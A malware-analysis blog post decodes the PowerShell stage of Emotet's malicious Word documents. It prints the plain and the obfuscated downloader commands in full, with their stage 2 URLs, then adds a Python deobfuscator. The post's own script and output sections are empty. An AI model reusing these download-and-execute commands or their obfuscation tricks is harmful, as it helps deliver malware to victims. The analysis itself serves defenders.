Friday, September 1, 2017

Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before: an email phish with a link, and the link downloads a malicious document. The document, usually a malicious Word document, uses VBA to build and execute a PowerShell command, which then downloads the next stage of infection.

This used to be very simple to see. For example, older observed variants produced the following PowerShell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

However, a newer variant now Base64-encodes the PowerShell, then uses some simple obfuscation techniques to make it harder for an analyst to identify the stage 2 links.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA==


echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d

${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/','sSad/,http','//arma','',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}}

You could work through the transpositions here manually; however, a nice technique was shown at Myonlinesecurity.
If you don't have immediate access to PowerShell, you could also manually copy the relevant pieces into a quick Python script.
Here is an example:

The output:
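
The Python approach described above, as an added example (this is not the original post's script): it strips the backtick escapes, collapses each -f format expression into the string it evaluates to, and lists the stage 2 URLs in defanged form. SAMPLE is two statements copied from the decoded script above; the function names are this example's own.

```python
import re

# Excerpt of the decoded script shown above (two statements, copied as-is).
SAMPLE = r'''${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');
${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/','sSad/,http','//arma','',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');
'''

# ("{1}{0}{2}"-f 'w-','ne','object'): a template of {n} placeholders,
# the -f operator, then a comma-separated list of single-quoted strings.
FORMAT_EXPR = re.compile(
    r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""",
    re.IGNORECASE,
)

def resolve_format(match):
    """Rebuild the string a single -f expression evaluates to."""
    args = re.findall(r"'([^']*)'", match.group(2))
    order = [int(n) for n in re.findall(r"\{(\d+)\}", match.group(1))]
    if any(n >= len(args) for n in order):
        return match.group(0)  # placeholder without an argument: leave as-is
    return "'" + "".join(args[n] for n in order) + "'"

def deobfuscate(script):
    """Strip backtick escapes, then collapse every -f expression."""
    # Assumption: backticks are only no-op escapes, as in this sample; a
    # script relying on `n or `t inside double quotes would need more care.
    return FORMAT_EXPR.sub(resolve_format, script.replace("`", ""))

def defang(url):
    """Render a URL in the hxxp://host[.]tld form used earlier in the post."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE).replace(".", "[.]")

def extract_urls(script):
    """Return the defanged stage 2 URLs found after deobfuscation."""
    found = re.findall(r"https?://[^\s'\",]+", deobfuscate(script), re.IGNORECASE)
    return [defang(u) for u in found]

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    for url in extract_urls(SAMPLE):
        print(url)
```

The URLs come out exactly as the fragments on this page assemble, so any entry that looks incomplete reflects the sample as posted.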

